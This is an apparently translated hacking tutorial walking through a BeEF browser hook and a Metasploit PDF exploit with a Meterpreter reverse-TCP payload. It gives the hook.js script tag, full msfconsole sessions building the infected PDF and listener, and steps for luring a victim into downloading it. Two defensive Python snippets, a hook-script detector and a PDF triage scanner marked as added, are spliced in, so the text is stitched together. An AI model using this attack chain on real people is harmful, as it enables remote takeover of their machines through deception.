USE METASPLOIT AND BEEF
Let's begin right away.
First, we create our own web page, such as the one below.
When the page is ready, do not forget to put in the script as follows: <script src='http://(ip address):3000/hook.js'></script>
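Seen from the side of a site owner or a filtering proxy, a hook like the one above is just an off-site script tag with a few telltale properties. The following is an added example, not part of the original post: it lists the script sources on a page and flags the ones served from a bare IP address, on port 3000, or from a hook.js path. The page host blog.example.com, the CDN host and the sample HTML are constructed for illustration.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse

class ScriptCollector(HTMLParser):
    """Collects the src attribute of every <script> tag on a page."""
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src")
        if tag == "script" and src:
            self.sources.append(src)

def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def audit_scripts(html, page_host):
    """Return (src, reasons) for off-site scripts that look like a browser hook."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.sources:
        url = urlparse(src)
        if not url.hostname or url.hostname == page_host:
            continue  # relative or same-host script: out of scope here
        reasons = []
        if is_ip_literal(url.hostname):
            reasons.append("bare IP host")
        if url.port == 3000:
            reasons.append("port 3000")
        if url.path.lower().endswith("/hook.js"):
            reasons.append("hook.js path")
        if reasons:
            findings.append((src, reasons))
    return findings

# Constructed sample page: one ordinary CDN script and one hook-style script.
SAMPLE_HTML = """<html><head>
<script src="https://cdn.example.com/lib.min.js"></script>
<script src='http://192.168.56.1:3000/hook.js'></script>
</head><body>tutorial</body></html>"""

if __name__ == "__main__":
    for src, reasons in audit_scripts(SAMPLE_HTML, "blog.example.com"):
        print(src, "->", ", ".join(reasons))
```

The port and path are defaults that can be changed, so treat a hit as a strong signal and a miss as no guarantee; a Content-Security-Policy that only allows scripts from known hosts covers the renamed case.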
After that, open BeEF.
Open the address http://192.168.56.1:3000/ui/panel in the browser.
The username and password are both beef.
After that we create a PDF file containing the payload, like this:
root@bt:~# msfconsole
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|`.""'.
II 6. .P : .' / | `. :
II 'T;. .;P' '.' / | `.'
II 'T; ;P' `. / | .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 798 exploits - 435 auxiliary - 133 post
+ -- --=[ 246 payloads - 27 encoders - 8 nops
=[ svn r14682 updated 27 days ago (2012.02.03)
Warning: This copy of the Metasploit Framework was last updated 27 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306
msf > search adobe_pdf
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/fileformat/adobe_pdf_embedded_exe 2010-03-29 excellent Adobe PDF Embedded EXE Social Engineering
exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs 2010-03-29 excellent Adobe PDF Escape EXE Social Engineering (No JavaScript)
msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe
msf exploit(adobe_pdf_embedded_exe) > show options
Module options (exploit/windows/fileformat/adobe_pdf_embedded_exe):
Name Current Setting Required Description
---- --------------- -------- -----------
EXENAME no The Name of payload exe.
FILENAME evil.pdf no The output filename.
INFILENAME yes The Input PDF filename.
LAUNCH_MESSAGE To view the encrypted content please tick the "Do not show this message again" box and press Open. no The message to display in the File: area
Exploit target:
Id Name
-- ----
0 Adobe Reader v8.x, v9.x (Windows XP SP3 English)
msf exploit(adobe_pdf_embedded_exe) > set FILENAME tutorial.pdf
FILENAME => tutorial.pdf
msf exploit(adobe_pdf_embedded_exe) > set INFILENAME /root/tutor.pdf
INFILENAME => /root/tutor.pdf
msf exploit(adobe_pdf_embedded_exe) > set OUTPUTPATH /root/
OUTPUTPATH => /root/
msf exploit(adobe_pdf_embedded_exe) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_pdf_embedded_exe) > show options
Module options (exploit/windows/fileformat/adobe_pdf_embedded_exe):
Name Current Setting Required Description
---- --------------- -------- -----------
EXENAME no The Name of payload exe.
FILENAME tutorial.pdf no The output filename.
INFILENAME /root/tutor.pdf yes The Input PDF filename.
LAUNCH_MESSAGE To view the encrypted content please tick the "Do not show this message again" box and press Open. no The message to display in the File: area
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Adobe Reader v8.x, v9.x (Windows XP SP3 English)
msf exploit(adobe_pdf_embedded_exe) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(adobe_pdf_embedded_exe) > set id 0
id => 0
msf exploit(adobe_pdf_embedded_exe) > exploit
[*] Reading in '/root/tutor.pdf'...
[*] Parsing '/root/tutor.pdf'...
[*] Parsing Successful.
[*] Using 'windows/meterpreter/reverse_tcp' as payload...
[*] Creating 'tutorial.pdf' file...
[+] tutorial.pdf stored at /root/.msf4/local/tutorial.pdf
Here we can see the result: the generated PDF with the payload we put in it.
The PDF can then be uploaded, and its link copied into the web page we created earlier.
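A file like the one generated above can be triaged before it reaches a reader. The following is an added example, not part of the original post: it counts the standard PDF name keys for launch actions, embedded files and script in the raw bytes, decoding #xx name escapes first. Which keys such a file contains is an assumption of this example, and the sample byte strings are constructed fragments, not output of the module.

```python
import re

# Standard PDF name keys checked here (an assumption of this example about
# what an embedded-EXE PDF contains; counts are a triage signal, not proof).
NAMES = ("/Launch", "/EmbeddedFile", "/JavaScript", "/JS", "/OpenAction")

def decode_name_escapes(data: bytes) -> bytes:
    """Undo #xx hex escapes so an obfuscated /L#61unch still counts as /Launch."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), data)

def count_names(data: bytes) -> dict:
    data = decode_name_escapes(data)
    counts = {}
    for name in NAMES:
        # The lookahead keeps /JS from matching /JSON, /EmbeddedFile from /EmbeddedFiles.
        pattern = re.escape(name.encode()) + rb"(?![A-Za-z0-9])"
        counts[name] = len(re.findall(pattern, data))
    return counts

def triage(data: bytes):
    """Return (verdict, counts); verdict is 'not-pdf', 'block', 'review' or 'pass'."""
    if b"%PDF-" not in data[:1024]:
        return "not-pdf", {}
    counts = count_names(data)
    active = counts["/JavaScript"] or counts["/JS"] or counts["/OpenAction"]
    if counts["/Launch"]:
        verdict = "block"    # a launch action can start an external program
    elif counts["/EmbeddedFile"] and active:
        verdict = "review"   # attachment plus something that runs on open
    else:
        verdict = "pass"
    return verdict, counts

# Constructed fragments for illustration only (not complete PDF files).
PLAIN_PDF = b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"
LAUNCH_PDF = (b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /OpenAction 3 0 R >>\nendobj\n"
              b"3 0 obj\n<< /Type /Action /S /L#61unch >>\nendobj\n")
ATTACH_PDF = (b"%PDF-1.5\n4 0 obj\n<< /Type /EmbeddedFile /Length 0 >>\nendobj\n"
              b"5 0 obj\n<< /S /JavaScript /JS (placeholder) >>\nendobj\n")

if __name__ == "__main__":
    for label, blob in (("plain", PLAIN_PDF), ("launch", LAUNCH_PDF), ("attach", ATTACH_PDF)):
        print(label, triage(blob))
```

Names stored inside compressed object streams are not visible to a raw byte scan, so a "pass" here means only that nothing was found in the uncompressed parts of the file.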
Then we lure the victim into opening our website, like this:
brooooo you do not want this great tutorial to learn and the language is not too high.
Once he has opened our website, we will see it in BeEF, which we reach through our browser.
In the picture below we can see in the online browsers list that the victim has been hooked.
Now we persuade him further to download the PDF file that contains the payload from before, by sending a message through the Alert Dialog module in BeEF.
The victim's IE will bring up the message that we wrote earlier.
When the victim clicks "here" on our website, the file is automatically saved on the victim's machine.
Before he opens the PDF file, we have already prepared for the catch with the commands below.
Here we use the multi handler module, which is our listener.
msf exploit(adobe_pdf_embedded_exe) > back
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(handler) > set id 0
id => 0
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.56.1:4444
[*] Starting the payload handler...
Once the listener is running and the victim opens the PDF file by clicking Open, we immediately get into Meterpreter.
[*] Sending stage (752128 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1147) at 2012-03-01 01:25:39 +0700
meterpreter >
This shows that we have entered Meterpreter. Just type shell, and we can control the victim's C:\ drive.
Good luck, I hope you succeed.
Confused, huh? Same here~
hahahaha.....
Yeah, bro.....
And there's no food left either....
hahaha